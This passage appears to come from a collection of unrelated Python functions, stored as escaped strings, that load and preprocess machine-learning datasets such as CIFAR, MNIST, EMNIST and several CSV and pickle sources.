AttributeError, \"Expect transpose permutation to be \"\n\n full_path = os.path.abspath(dirname)\n \n train_path = os.path.join(full_path, 'train')\n test_path = os.path.join(full_path, 'test')\n \n #Load the training set\n with open(train_path, 'rb') as tr_f:\n tr_data_raw = pickle.load(tr_f)\n tr_data = {}\n \n for key, val in tr_data_raw.items():\n tr_data[key.decode('utf8')] = val #32 x 32 x 3 images.\n \n tr_X = tr_data['data']\n \n if labels=='fine':\n tr_y = tr_data['fine_labels']\n elif labels=='coarse':\n tr_y = tr_data['coarse_labels']\n \n tr_X = tr_X.reshape(tr_X.shape[0], 3, 32, 32)\n tr_y = np.reshape(tr_y, (len(tr_y), 1))\n \n #Load the testing set\n with open(test_path, 'rb') as te_f:\n te_data_raw = pickle.load(te_f)\n te_data = {}\n \n for key, val in te_data_raw.items():\n te_data[key.decode('utf8')] = val #32 x 32 x 3 images.\n \n te_X = te_data['data']\n \n if labels=='fine':\n te_y = te_data['fine_labels']\n elif labels=='coarse':\n te_y = te_data['coarse_labels']\n \n te_X = te_X.reshape(te_X.shape[0], 3, 32, 32)\n te_y = np.reshape(te_y, (len(te_y), 1))\n \n #scale to 255, transpose as needed\n tr_X = np.transpose(tr_X.astype('float32') / 255., transpose_permutation)\n te_X = np.transpose(te_X.astype('float32') / 255., transpose_permutation)\n \n return (tr_X, tr_y), (te_X, te_y), 100", "def load_data(dataset_name: str, cola_name: str, colb_name: str) -> np.mat:\r\n import seaborn as sns\r\n\r\n data = sns.load_dataset(dataset_name)\r\n col_a = np.array(data[cola_name]) # total_bill\r\n col_b = np.array(data[colb_name]) # tip\r\n\r\n mcol_a = np.mat(col_a)\r\n mcol_b = np.mat(col_b)\r\n\r\n m = np.shape(mcol_b)[1]\r\n one = np.ones((1, m), dtype=int)\r\n\r\n # horizontal stacking\r\n training_data = np.hstack((one.T, mcol_a.T))\r\n\r\n return training_data, mcol_b, col_a, col_b", "def load_data_preprocess(self):\n\n print(\"Loading the dataset ...\")\n # load the data\n c_util = CarUtils()\n train_x, train_y, test_x, test_y, classes = c_util.load_data()\n\n # set the image ordering\n K.set_image_dim_ordering(\"th\")\n\n print(\"Pre-processing the dataset ...\")\n # pre-process the data\n train_x = train_x.astype('float32')\n test_x = test_x.astype('float32')\n\n train_x = train_x / 255\n test_x = test_x / 255\n\n print(train_x.shape[0], ' train samples')\n print(test_x.shape[0], ' test samples')\n\n train_y = np_utils.to_categorical(train_y, CarsClassifierModel._nb_classes)\n test_y = np_utils.to_categorical(test_y, CarsClassifierModel._nb_classes)\n\n return train_x, train_y, test_x, test_y", "def readData():\n\tN = 800\n\tD = 28*28\n\tX = np.zeros((N, D), dtype=np.uint8)\n\n\tf = open(\"data/a012_images.dat\", 'rb')\n\n\tfor i in range(0, N):\n\t\tX[i, :] = np.fromstring(f.read(D), dtype='uint8')\n\n\tf.close()\n\n\treturn X", "def load_images(filename='training_images'): \n file_path = os.path.join(DATA_DIR, filename)\n with open(file_path, 'rb') as f:\n b = f.read() # hope ya get it all\n\n # grab the first four numbers ...\n # fmt='>i' means big-endian int32\n magic, n_images, n_rows, n_cols = (struct.unpack('>i', b[i*4:(i+1)*4]) for i in range(4))\n\n # i am a god-fearing man\n assert magic[0] == 2051, \"bad magic number, what do?\"\n\n\n # so i think you can use the standard libary's \"array\" for this, just\n # because binary data of any sort is kinda dodgy, but this grabs 'the rest'\n # format='B' means unsigned char === 'uint8', and apparently endianness doesn't matter\n image_stream = array.array('B', b[16:])\n\n # so each 28*28 byte portion of image_stream is a flattened image. these two\n # numpy.reshape calls get it into the desired shape for A. maybe could\n # combine it into one call, idk. anyway, each flattened image appears as a\n # row, and there is a row for each image.\n image_first = numpy.reshape(image_stream, (n_images[0], n_rows[0], n_cols[0]))\n images = image_first.reshape(n_images[0], n_rows[0]*n_cols[0])\n\n # convert to float in [0,1]\n images = images.astype('f') / 255\n\n return images", "def load_next_batch(self, roidb, num_classes):\n num_images = len(roidb)\n # Sample random scales to use for each image in this batch\n random_scale_inds = np.random.randint( 0, high=len(self.config.TRAIN.SCALES), size=num_images)\n assert (self.config.TRAIN.BATCH_SIZE % num_images == 0), 'num_images ({}) must divide BATCH_SIZE ({})'. \\\n format(num_images, self.config.TRAIN.BATCH_SIZE)\n \n # Get the input image blob, formatted for caffe\n im_blob, im_scales = self._get_image_blobs(roidb, random_scale_inds)\n \n blobs = {'data': im_blob}\n \n assert len(im_scales) == 1, \"Single batch only\"\n assert len(roidb) == 1, \"Single batch only\"\n # gt boxes: (x1, y1, x2, y2, cls)\n gt_inds = np.where(roidb[0]['gt_classes'] != 0)[0]\n gt_boxes = np.empty((len(gt_inds), 5), dtype=np.float32)\n gt_boxes[:, 0:4] = roidb[0]['boxes'][gt_inds, :] * im_scales[0]\n gt_boxes[:, 4] = roidb[0]['gt_classes'][gt_inds]\n blobs['gt_boxes'] = gt_boxes\n blobs['gt_ishard'] = roidb[0]['gt_ishard'][gt_inds] if 'gt_ishard' in roidb[0] \\\n else np.zeros(gt_inds.size, dtype=int)\n # blobs['gt_ishard'] = roidb[0]['gt_ishard'][gt_inds]\n blobs['dontcare_areas'] = roidb[0]['dontcare_areas'] * im_scales[0] if 'dontcare_areas' in roidb[0] \\\n else np.zeros([0, 4], dtype=float)\n blobs['im_info'] = np.array([[im_blob.shape[1], im_blob.shape[2], im_scales[0]]], dtype=np.float32)\n blobs['im_name'] = os.path.basename(roidb[0]['image'])\n \n return blobs", "def test_load_and_featurize_data_single_column_batch_overflow():\n feat = ImageFeaturizer()\n feat.featurize(save_features=True, **LOAD_DATA_ARGS)\n check_array = np.load(CHECK_ARRAY.format('squeezenet'))\n try:\n compare_featurizer_class(feat, (227, 227), check_array, featurized=True,\n check_csv=CHECK_CSV.format('squeezenet'), **COMPARE_ARGS)\n finally:\n # Remove path to the generated csv at the end of the test\n remove_generated_paths()\n del feat", "def load_EMNIST_data(file, verbose = False, standarized = False): \n mat = sio.loadmat(file)\n data = mat[\"dataset\"]\n \n X_train = data['train'][0,0]['images'][0,0]\n X_train = X_train.reshape((X_train.shape[0], 28, 28), order = \"F\")\n y_train = data['train'][0,0]['labels'][0,0]\n y_train = np.squeeze(y_train)\n y_train -= 1 #y_train is zero-based\n \n X_test = data['test'][0,0]['images'][0,0]\n X_test= X_test.reshape((X_test.shape[0], 28, 28), order = \"F\")\n y_test = data['test'][0,0]['labels'][0,0]\n y_test = np.squeeze(y_test)\n y_test -= 1 #y_test is zero-based\n \n if standarized: \n X_train = X_train/255\n X_test = X_test/255\n mean_image = np.mean(X_train, axis=0)\n X_train -= mean_image\n X_test -= mean_image\n \n\n if verbose == True: \n print(\"EMNIST-letter dataset ... \")\n print(\"X_train shape :\", X_train.shape)\n print(\"X_test shape :\", X_test.shape)\n print(\"y_train shape :\", y_train.shape)\n print(\"y_test shape :\", y_test.shape)\n \n return X_train, y_train, X_test, y_test", "def _load_data(self):\n pickle_in = open(\"X_train.pickle\", \"rb\")\n self.X = pickle.load(pickle_in)\n pickle_in = open(\"y_train.pickle\", \"rb\")\n self.Y = pickle.load(pickle_in)\n\n pickle_in = open(\"X_test.pickle\", \"rb\")\n self.X_final = pickle.load(pickle_in)\n pickle_in = open(\"y_test.pickle\", \"rb\")\n self.Y_final = pickle.load(pickle_in)\n\n # Set input shape:\n if K.image_data_format() == 'channels_first':\n self.input_shape = (3, self.img_rows, self.img_cols)\n else:\n self.input_shape = (self.img_rows, self.img_cols, 3)\n\n self.X = self.X.astype('float32')\n self.X /= 255\n self.X_final = self.X_final.astype('float32')\n self.X_final /= 255\n print('X shape:', self.X.shape)\n print(self.X.shape[0], 'Samples')\n\n num_datapoints = 3000\n self.X = self.X[0:num_datapoints]\n self.Y = self.Y[0:num_datapoints]\n\n num_datapoints = 2000\n self.X_final = self.X_final[0:num_datapoints]\n self.Y_final = self.Y_final[0:num_datapoints]\n\n self.Y_final = to_categorical(self.Y_final, self.num_classes)\n\n # Initialize Data\n kfold = StratifiedKFold(n_splits=self.nFolds, shuffle=True)\n\n if self.b_eval_advanced:\n # Loop through the indices the split() method returns\n for index, (train_indices, test_indices) in enumerate(kfold.split(self.X, self.Y)):\n if index == 0:\n self.Y = to_categorical(self.Y, self.num_classes)\n\n # Generate batches from indices\n xtrain, xtest = self.X[train_indices], self.X[test_indices]\n ytrain, ytest = self.Y[train_indices], self.Y[test_indices]\n\n self.data.append(tuple([xtrain, xtest, ytrain, ytest]))\n\n if not self.b_eval_advanced:\n self.Y = to_categorical(self.Y, self.num_classes)\n\n #print(np.asarray(self.data).shape)\n #print(self.data)\n print(\"Y_final Shape\", self.Y_final.shape)", "def load_validation_data():\n X = np.load('../input/X_validate.npy')\n ids = np.load('../input/ids_validate.npy')\n\n X = X.astype(np.float32)\n X /= 255\n\n return X, ids", "def load_preprocess_test_batch(batch_id, batch_size):\r\n filename = 'preprocess_test_' + str(batch_id) + '.p'\r\n features, labels = pickle.load(open(filename, mode='rb'))\r\n# labels = np.argmax(labels,1)\r\n# num = len(labels)\r\n# arr = np.zeros((num, 1))\r\n# for i in range(num):\r\n# arr[i][0] = labels[i]\r\n# ind = [i for i in range(len(features))]\r\n# random.shuffle(ind)\r\n# features = features[ind]\r\n# labels = labels[ind]\r\n\r\n # Return the training data in batches of size <batch_size> or less\r\n return features[1200:batch_size],labels[1200:batch_size]\r\n #return batch_features_labels(features, labels, batch_size)\r", "def load_dataset(self):\n\n train_path = os.path.join(self.dataset_path, 'images_background')\n validation_path = os.path.join(self.dataset_path, 'images_evaluation')\n\n # First let's take care of the train alphabets\n for alphabet in os.listdir(train_path):\n if alphabet[0] == '.':\n continue\n alphabet_path = os.path.join(train_path, alphabet)\n\n current_alphabet_dictionary = {}\n\n for character in os.listdir(alphabet_path):\n if character[0] == '.':\n continue\n character_path = os.path.join(alphabet_path, character)\n\n current_alphabet_dictionary[character] = os.listdir(\n character_path)\n\n self.train_dictionary[alphabet] = current_alphabet_dictionary\n\n # Now it's time for the validation alphabets\n for alphabet in os.listdir(validation_path):\n alphabet_path = os.path.join(validation_path, alphabet)\n if alphabet[0] == '.':\n continue\n\n current_alphabet_dictionary = {}\n\n for character in os.listdir(alphabet_path):\n if character[0] == '.':\n continue\n character_path = os.path.join(alphabet_path, character)\n\n current_alphabet_dictionary[character] = os.listdir(\n character_path)\n\n self.evaluation_dictionary[alphabet] = current_alphabet_dictionary", "def get_train_data(batch_size=8):\n transform_train = transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.RandomFlipLeftRight(),\n transforms.RandomColorJitter(brightness=0.4, contrast=0.4, saturation=0.4),\n transforms.RandomLighting(0.1),\n transforms.ToTensor(),\n transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))\n ])\n\n img_folder, img_file = get_data_path()\n td = MultilabelDataset(data_folder=img_folder, data_file=img_file)\n train_data = DataLoader(td.transform_first(transform_train), batch_size=batch_size, shuffle=True)\n return train_data", "def _load20news_miao():\n DIR = os.path.dirname(os.path.realpath(__file__)).split('vae_sparse')[0]+'vae_sparse/optvaedatasets'\n DIR += '/20news_miao'\n h5file = DIR+'/miao.h5'\n if not os.path.exists(h5file):\n flen = len(open(DIR+'/vocab').readlines())\n print 'DIM: ',flen\n np.random.seed(1)\n TRAIN_VALID_MAT = readSparseFile(DIR+'/train.feat', flen, zeroIndexed=False)\n idx = np.random.permutation(TRAIN_VALID_MAT.shape[0])\n VALIDMAT = TRAIN_VALID_MAT[idx[:500]]\n TRAINMAT = TRAIN_VALID_MAT[idx[500:]]\n TESTMAT = readSparseFile(DIR+'/test.feat', flen, zeroIndexed=False) \n saveSparseHDF5(TRAINMAT,'train', h5file)\n saveSparseHDF5(VALIDMAT,'valid', h5file)\n saveSparseHDF5(TESTMAT, 'test' , h5file)\n dset = {}\n dset['vocabulary']= [k.strip().split(' ')[0] for k in open(DIR+'/vocab').readlines()]\n dset['train'] = loadSparseHDF5('train',h5file)\n dset['valid'] = loadSparseHDF5('valid',h5file)\n dset['test'] = loadSparseHDF5('test',h5file)\n dset['dim_observations'] = dset['train'].shape[1]\n dset['data_type'] = 'bow'\n return dset", "def loadData(self):\n batch_size = 256\n \n #if self.conv_sg == True:\n # batch_size = 1 \n \n download = True\n root = self.root + self.dataset\n if self.dataset == \"MNIST\": \n transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))])\n trainset = torchvision.datasets.MNIST(root, train=True, download=download, transform=transform)\n testset = torchvision.datasets.MNIST(root, train=False, download=download, transform=transform)\n \n if self.dataset == \"CIFAR10\":\n transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465,), (0.2023, 0.1994, 0.2010,))])\n trainset = torchvision.datasets.CIFAR10(root, train=True, download=download, transform=transform)\n testset = torchvision.datasets.CIFAR10(root, train=False, download=download, transform=transform)\n \n if self.dataset == \"CIFAR100\":\n transform = transforms.Compose([transforms.ToTensor()])\n trainset = torchvision.datasets.CIFAR100(root, train=True, download=download, transform=transform)\n testset = torchvision.datasets.CIFAR100(root, train=False, download=download, transform=transform)\n \n \n trainloader = torch.utils.data.DataLoader(trainset, batch_size = batch_size,\n shuffle=False, num_workers=0, pin_memory = False)\n \n testloader = torch.utils.data.DataLoader(testset, batch_size= batch_size,\n shuffle=False, num_workers=2, pin_memory = False)\n \n return trainloader, testloader", "def load_train_data():\r\n X_train = np.load('data/train/X_train.npy')\r\n scaling_train = np.load('data/train/scaling_train.npy')\r\n ids_train = np.load('data/train/ids_train.npy')\r\n y_train = np.load('data/train/y_train.npy')\r\n\r\n seed = np.random.randint(1, 10e6)\r\n np.random.seed(seed)\r\n np.random.shuffle(X_train)\r\n np.random.seed(seed)\r\n np.random.shuffle(scaling_train)\r\n np.random.seed(seed)\r\n np.random.shuffle(ids_train)\r\n np.random.seed(seed)\r\n np.random.shuffle(y_train)\r\n\r\n return X_train, scaling_train, ids_train, y_train", "def load_data(datafile, num_class, save=False, save_path='dataset.pkl'):\n train_list = open(datafile, 'r')\n labels = []\n images = []\n for line in train_list:\n tmp = line.strip().split(' ')\n filepath = tmp[0]\n print(filepath)\n img = Image.open(filepath)\n img = prep.resize_image(img, 224, 224)\n np_img = prep.pil_to_nparray(img)\n images.append(np_img)\n\n # one-hot encoder\n index = int(tmp[1])\n label = np.zeros(num_class)\n label[index] = 1\n labels.append(label)\n if save:\n pickle.dump((images, labels), open(save_path, 'wb'))\n return images, labels", "def _load_data(self):\n data_x, data_y = make_classification(n_samples=5000, n_features=20,\n n_informative=10,\n n_redundant=0, n_repeated=0,\n n_classes=2,\n n_clusters_per_class=4,\n weights=None, flip_y=0.01,\n class_sep=1.0, hypercube=True,\n shift=0.0, scale=1.0,\n shuffle=True,\n random_state=self.args.rand_seed)\n\n self.orig_column_names = np.arange(data_x.shape[-1])\n self.data_x = data_x\n self.data_y = self.to_one_hot_encoding(data_y)\n self.numerical_idx = np.arange(data_x.shape[-1])\n self.non_num_idx = None\n self.all_non_numerical_idx = None\n\n # Calculate adjacency matrix\n self.meta_inf = data_x[:, :1].astype('float32')\n if self.args.graph_type:\n self.adj = self.get_adjacency()", "def preprocess_the_dataset(x_train):\n # initialize empty lists\n x_real,x_pencil=[],[]\n for image in x_train[:8000]:\n real_image = resize_128(image)\n # make it pencil drawn\n pencil_image = convert_image(real_image)\n x_real.append(real_image/127.5-1)\n x_pencil.append(pencil_image/127.5-1)\n return x_real,x_pencil", "def load_data(data_path=DATA_PATH):\n with open (os.path.join(DATA_PATH, \"imdb_extrait.pkl\"),\"rb\") as file:\n \n [data , id2titles , fields ]= pk.load(file)\n \n \n datax = data [: ,:33]\n datay = np.array([1 if x [33] >6.5 else -1 for x in data ])\n \n return datax, datay, id2titles, fields", "def load_data_from_fold(data_path):\r\n print(\"\\nLoading data from json folder {}\".format(data_path))\r\n\r\n SAMPLES_TO_CONSIDER = 22050\r\n\r\n data = preprocess_dataset(data_path, SAMPLES_TO_CONSIDER)\r\n\r\n X = np.array(data[\"MFCCs\"])\r\n y = np.array(data[\"labels\"])\r\n print(\"Training sets loaded!\")\r\n print(\"data size :\", X.shape, \"labels size: \", y.shape)\r\n print(\"release the 'data' for memories\")\r\n del data\r\n\r\n return X, y", "def training_data():\n global _MEAN # pylint: disable=global-statement\n _np.random.seed(1)\n view = _skdc10.view.OfficialImageClassificationTask()\n permutation = _np.random.permutation(range(50000))\n if _MEAN is None:\n _MEAN = view.train.x.reshape((50000 * 32 * 32, 3)).mean(axis=0)\n return ((view.train.x[:50000, :][permutation, :] - _MEAN).\n transpose((0, 3, 1, 2)).astype('float32'),\n view.train.y[:50000][permutation].reshape((50000, 1)).astype('float32'))", "def load_train_x(train_x_path):\n \n text = open(train_x_path, 'r')\n row = csv.reader(text , delimiter=\",\")\n x = []\n n_row = 0\n for r in row:\n if n_row != 0:\n for j in range(23):\n x.append(float(r[j]))\n n_row += 1\n text.close()\n x = np.array(x)\n x = np.reshape(x, (20000,23))\n \n return x", "def __init__(self, data_path):\r\n\t\tfile_names = ['data_batch_%d' % i for i in range(1,6)]\r\n\t\tfile_names.append('test_batch')\r\n\r\n\t\tX = []\r\n\t\ty = []\r\n\t\tfor file_name in file_names:\r\n\t\t\twith open(data_path + file_name) as fin:\r\n\t\t\t\tdata_dict = cPickle.load(fin)\r\n\t\t\tX.append(data_dict['data'].ravel())\r\n\t\t\ty = y + data_dict['labels']\r\n\r\n\t\tself.X = np.asarray(X).reshape(60000, 32*32*3)\r\n\t\tself.y = np.asarray(y)\r\n\r\n\t\tfin = open(data_path + 'batches.meta')\r\n\t\tself.LABEL_NAMES = cPickle.load(fin)['label_names']\r\n\t\tfin.close()", "def load_bc(self):\r\n\r\n # Open the file and read all the lines.\r\n array = np.loadtxt(self.bc_file)\r\n\r\n # Convert the columns to appropriate type.\r\n self.beta = array[:, 0]\r\n self.code = array[:, 1].astype(int)", "def load_oat1_3_big(self):\n source_df = pd.read_csv('./datasets/metabolites/OAT1OAT3Big.csv')\n source_df['SLC'] = source_df['SLC'].astype('category').cat.codes\n\n to_drop = [0, 2, 3, 4, ]\n\n df = source_df.drop(source_df.columns[to_drop], axis=1)\n\n print('Loaded in data, null values found: ', end=' ')\n print(df[pd.isnull(df).any(axis=1)])\n\n label_index = 1 # this is from source\n print(\"Data shape: \", df.shape[0])\n\n X = np.array([np.array(df.iloc[x, :]) for x in range(df.shape[0])])\n Y = np.array(source_df.iloc[:, label_index])\n\n header = np.array(df.columns)\n\n if self.scale:\n feature_scaler = StandardScaler()\n X = feature_scaler.transform(X)\n\n return X, Y, header", "def __init__(self, filepath='multidrcl', suffix='DRCL', extension='.IMG', lblext='.LBL', force_read=True, unit='s', feature='sh', eye='L', do_print=True, initdatadir=None, initdata=None, readintuple=None):\n\n Dataset.__init__(self, None, \"mastcam\")\n\n if readintuple != None:\n (self.data, self.fullimages, self.segmentation, self.labels, self.xlabel, self.ylabel, self.xvals, self.rgbdict, self.lblext) = readintuple[0:9]\n if initdata != None:\n self.initdata = initdata\n if self.initfilename != None:\n self.initfilename = initarchive\n else:\n self.initfilename = 'param'\n return\n \n if do_print: print(filepath)\n \n if filepath == '388':\n filepath = '/proj/imbue/data/msl-mastcam/sol388/'\n \n if filepath == 'multidrcl':\n filepath = '/proj/imbue/data/msl-mastcam/multispectral_drcl/'\n \n self.filepath = filepath\n self.xlabel = 'TBD'\n self.ylabel = 'TBD'\n \n #dirname = filepath[:-1]\n #subsetname = dirname.split('/')[-1]\n subsetname = os.path.basename(filepath)\n self.name += \"-\" + subsetname\n if len(suffix) > 0:\n self.name += \"-\" + eye + '-' + suffix + '-' + unit + '-' + feature\n if do_print: print(\"Dataset name: \" + self.name)\n \n self.data = []\n self.cadence = []\n \n self.unit = unit\n self.feature = feature\n self.eye = eye\n\n self.rgbdict = {}\n self.extension = extension\n self.lblext = lblext\n self.suffix = suffix\n \n self.archive = os.path.join(filepath,\n subsetname + eye + \"_\" + suffix + '_' + unit + '_' + feature + \".pkl\")\n\n if initdata != None:\n self.initdata = initdata\n if self.initfilename != None:\n self.initfilename = initarchive\n else:\n self.initfilename = 'param'\n elif initdatadir != None:\n print(\"Reading in initialization data...\")\n #initsubsetname = initdatadir[:-1].split('/')[-1]\n initsubsetname = os.path.basename(initdatadir)\n initarchive = os.path.join(initdatadir,\n initsubsetname + eye + \"_\" + suffix + '_' + unit + '_' + feature + \".pkl\")\n if os.path.exists(initarchive):\n with open(initarchive, 'r') as f:\n self.initdata = pickle.load(f)[0]\n self.initfilename = initarchive\n print(\"...done!\")\n print(\"initdata.shape:\", self.initdata.shape)\n else:\n print(\"...initialization data does not exist!\")\n print(\"Desired pickle was: %s\" % initarchive)\n \n # Determine if we need to preprocess the data\n if (not os.path.exists(self.archive)) or force_read:\n self.read_mastcam_dir(filepath, suffix, unit, feature, extension, lblext, eye)\n else:\n if do_print: print(\"Found pickle at \" + self.archive)\n \n self.readin()", "def load_letter(folder, min_num_images):\n image_files = os.listdir(folder)\n dataset = np.ndarray(shape=(len(image_files), image_size, image_size),\n dtype=np.float32)\n image_index = 0\n print(folder)\n for image in os.listdir(folder):\n image_file = os.path.join(folder, image)\n try:\n image_data = (ndimage.imread(image_file).astype(float) - \n pixel_depth / 2) / pixel_depth\n if image_data.shape != (image_size, image_size):\n raise Exception('Unexpected image shape: %s' % str(image_data.shape))\n dataset[image_index, :, :] = image_data\n image_index += 1\n except IOError as e:\n print('Could not read:', image_file, ':', e, '- it\\'s ok, skipping.')\n \n num_images = image_index\n dataset = dataset[0:num_images, :, :]\n if num_images < min_num_images:\n raise Exception('Many fewer images than expected: %d < %d' %\n (num_images, min_num_images))\n \n print('Full dataset tensor:', dataset.shape)\n print('Mean:', np.mean(dataset))\n print('Standard deviation:', np.std(dataset))\n return dataset", "def _read_datafile(self,path):\n \tlabels, images = [], []\n \twith gzip.GzipFile(path) as f:\n \t for line in f:\n \t vals = line.strip().split()\n \t labels.append(float(vals[0]))\n \t images.append([float(val) for val in vals[1:]])\n \tlabels = np.array(labels, dtype=np.int32)\n \tlabels[labels == 10] = 0 # fix weird 0 labels\n \timages = np.array(images, dtype=np.float32).reshape(-1, 16, 16, 1)\n \timages = (images + 1) / 2\n \treturn images, labels", "def load_back_from_disk(data_dir, istrain=True):\n \"\"\"load back metadata_df\"\"\"\n meta_data = pickle.load(open(os.path.join(data_dir, 'meta.pkl'), 'rb'))\n metadata_rows = meta_data[0]\n max_node = meta_data[1]\n\n \"\"\"itershard by loading from disk\"\"\"\n all_X, all_y, all_size, all_L, all_names, all_node_img = [], [], [], [], [], []\n\n for _, row in enumerate(metadata_rows):\n X = np.array(io_utils.load_from_disk(os.path.join(data_dir, row['X'])))\n L = np.array(io_utils.load_from_disk(os.path.join(data_dir, row['L'])))\n y = np.array(io_utils.load_from_disk(os.path.join(data_dir, row['y'])))\n size = np.array(io_utils.load_from_disk(os.path.join(data_dir, row['size'])))\n names = np.array(io_utils.load_from_disk(os.path.join(data_dir, row['name'])))\n node_img = np.array(io_utils.load_from_disk(os.path.join(data_dir, row['node_img'])))\n\n \"\"\" stack to list\"\"\"\n all_X.append(X)\n all_y.append(y)\n all_L.append(L)\n all_size.append(size)\n all_names.append(names)\n all_node_img.append(node_img)\n\n \"\"\" return a Dataset contains all X, y, w, ids\"\"\"\n all_X = np.squeeze(np.vstack(all_X))\n all_L = np.squeeze(np.vstack(all_L))\n all_y = np.squeeze(np.concatenate(all_y))\n all_size = np.squeeze(np.concatenate(all_size))\n all_names = np.squeeze(np.concatenate(all_names))\n all_node_img = np.squeeze(np.concatenate(all_node_img))\n\n # create output dataset\n dataset = dict()\n if istrain:\n dataset['X'] = all_X[:TRAIN_NUM]\n dataset['y'] = all_y[:TRAIN_NUM]\n dataset['size'] = all_size[:TRAIN_NUM]\n dataset['L'] = all_L[:TRAIN_NUM]\n dataset['name'] = all_names[:TRAIN_NUM]\n dataset['node_img'] = all_node_img[:TRAIN_NUM]\n else:\n dataset['X'] = all_X[:TEST_NUM]\n dataset['y'] = all_y[:TEST_NUM]\n dataset['size'] = all_size[:TEST_NUM]\n dataset['L'] = all_L[:TEST_NUM]\n dataset['name'] = all_names[:TEST_NUM]\n dataset['node_img'] = all_node_img[:TEST_NUM]\n\n return dataset, max_node", "def load_data(path, mode='train'):\n\n labels_path = os.path.join(path, f'{mode}-labels-idx1-ubyte.gz')\n images_path = os.path.join(path, f'{mode}-images-idx3-ubyte.gz')\n\n with gzip.open(labels_path, 'rb') as lbpath:\n labels = np.frombuffer(lbpath.read(), dtype=np.uint8, offset=8)\n\n with gzip.open(images_path, 'rb') as imgpath:\n images = np.frombuffer(imgpath.read(), dtype=np.uint8, offset=16).reshape(len(labels), 784)\n\n normalized_images = normalize_data(images)\n one_hot_labels = one_hot_encoding(labels, num_classes=10)\n\n return normalized_images, one_hot_labels", "def _load_data(self):\n\n path_data_x = \\\n '/workspace/base-ml/data/tadpole/adni_one_baseline_feature_data' \\\n '.csv'\n path_data_y = \\\n '/workspace/base-ml/data/tadpole/adni_one_baseline_label_data' \\\n '.csv'\n path_meta = '/workspace/base-ml/data/tadpole' \\\n '/adni_one_baseline_meta_data' \\\n '.csv'\n read_data_x = pd.read_csv(path_data_x)\n read_data_y = pd.read_csv(path_data_y) # 0 NL, 1, MCI, 2 Dementia\n read_data_meta = pd.read_csv(path_meta)[['AGE', 'PTGENDER', 'APOE4']]\n\n # Replace gender to numeric\n read_data_meta.PTGENDER = read_data_meta.PTGENDER.replace('Male', 0)\n read_data_meta.PTGENDER = read_data_meta.PTGENDER.replace('Female', 1)\n\n new_data_x = np.array(read_data_x).astype(np.float32)\n new_data_y = np.array(read_data_y).astype(np.float32)\n new_data_meta = np.array(read_data_meta).astype(np.float32)\n\n # Concat meta-information with feature vector input\n concat_meta = pd.DataFrame(new_data_meta)\n concat_meta.iloc[:, 2] = concat_meta.iloc[:, 2].replace(0, 'zero')\n concat_meta.iloc[:, 2] = concat_meta.iloc[:, 2].replace(1, 'one')\n concat_meta.iloc[:, 2] = concat_meta.iloc[:, 2].replace(2, 'two')\n concat_meta = concat_meta.to_numpy()\n new_data_x = np.concatenate([concat_meta, new_data_x], 1)\n print(new_data_x.shape, new_data_y.shape, new_data_meta.shape)\n\n self.orig_column_names = ['Age', 'Gender', 'APOE4'] + \\\n list(read_data_x.columns)\n self.data_x = new_data_x\n self.data_y = self.to_one_hot_encoding(new_data_y)\n self.numerical_idx = np.arange(new_data_x.shape[-1])\n self.numerical_idx = np.delete(self.numerical_idx, [2]) # Remove APOE column idx\n self.non_num_idx = np.array([2])\n self.all_non_numerical_idx = None\n\n # self.numerical_idx = np.arange(self.data_x.shape[-1])\n # self.non_num_idx = None\n # self.all_non_numerical_idx = None\n\n # Calculate adjacency matrix\n self.meta_inf = new_data_meta.astype('float32')\n if self.args.graph_type:\n self.adj = self.get_adjacency()", "def load_and_process(data_dir, train_node_num, eval_node_num, test_node_num):\n biases, feature, label = get_biases_features_labels(data_dir)\n # split training, validation and testing set\n nodes_num = label.shape[0]\n train_mask = get_mask(nodes_num, 0, train_node_num)\n eval_mask = get_mask(nodes_num, train_node_num, train_node_num + eval_node_num)\n test_mask = get_mask(nodes_num, nodes_num - test_node_num, nodes_num)\n\n y_train = np.zeros(label.shape)\n y_val = np.zeros(label.shape)\n y_test = np.zeros(label.shape)\n\n y_train[train_mask, :] = label[train_mask, :]\n y_val[eval_mask, :] = label[eval_mask, :]\n y_test[test_mask, :] = label[test_mask, :]\n\n y_train = y_train[np.newaxis]\n y_val = y_val[np.newaxis]\n y_test = y_test[np.newaxis]\n train_mask = train_mask[np.newaxis]\n eval_mask = eval_mask[np.newaxis]\n test_mask = test_mask[np.newaxis]\n\n return feature, biases, y_train, train_mask, y_val, eval_mask, y_test, test_mask", "def load_CIFAR_batch(filename):\n with open(filename, 'rb') as f:\n #一个样本由标签和图像数据组成\n #3072 = 32 x 32 x 3\n data_dict = p.load(f, encoding= 'bytes')\n images = data_dict[b'data']\n labels = data_dict[b'labels']\n #把原始数据结构调整为BCWH batches, channels, width, height\n images = images.reshape(10000, 3, 32, 32)\n #tensorflow 处理图像数据的结构:BWHC\n #把C移动到最后一个维度\n images = images.transpose(0, 2, 3, 1)\n\n labels = np.array(labels)\n return images, labels", "def load_dataset(ipc = 20000):\n files = os.listdir(\"..\\\\data\")\n ind = 0\n xs = []\n ys = []\n classNames = []\n for file in files:\n fileSplit = file.split('.')\n print('--Loading ' + fileSplit[0][18:] + ' data.')\n classNames.append(fileSplit[0][18:])\n x = np.load(\"..\\\\data\\\\\" + file)\n x = x.astype('float32')/255\n xs.append(x[0:ipc, :])\n y = np.array([float(ind) for i in range(ipc)])\n ys.append(y.reshape(ipc, 1))\n ind += 1\n\n xs = np.array(xs)\n ys = np.array(ys)\n xs = xs.reshape(xs.shape[0]*xs.shape[1], xs.shape[2])\n ys = ys.reshape(ys.shape[0]*ys.shape[1], ys.shape[2])\n return xs, ys, classNames", "def load_dataset(data_dir, img_size):\n global input_set\n global test_set\n\n imgs = []\n img_files = os.listdir(data_dir)\n for img in img_files:\n # try:\n tmp = scipy.misc.imread(data_dir + \"/\" + img)\n x, y, z = tmp.shape # shape : width * length * chanel\n coords_x = int(x / img_size) # 坐标\n coords_y = int(y / img_size) #\n coords = [(q, r) for q in range(coords_x) for r in range(coords_y)] # 列表 x * y\n for coord in coords:\n imgs.append((data_dir + \"/\" + img, coord)) # 为列表添加文件目录\n # except BaseException:\n # print(\"oops\")\n test_size = min(10, int(len(imgs) * 0.2))\n random.shuffle(imgs)\n test_set = imgs[:test_size]\n train_set_X = imgs[test_size:][:200]\n train_set = imgs[test_size:][200:400]\n return", "def load_data(tetrode_number=TETRODE_NUMBER):\n print(\"Loading data...\")\n X_train, X_valid, 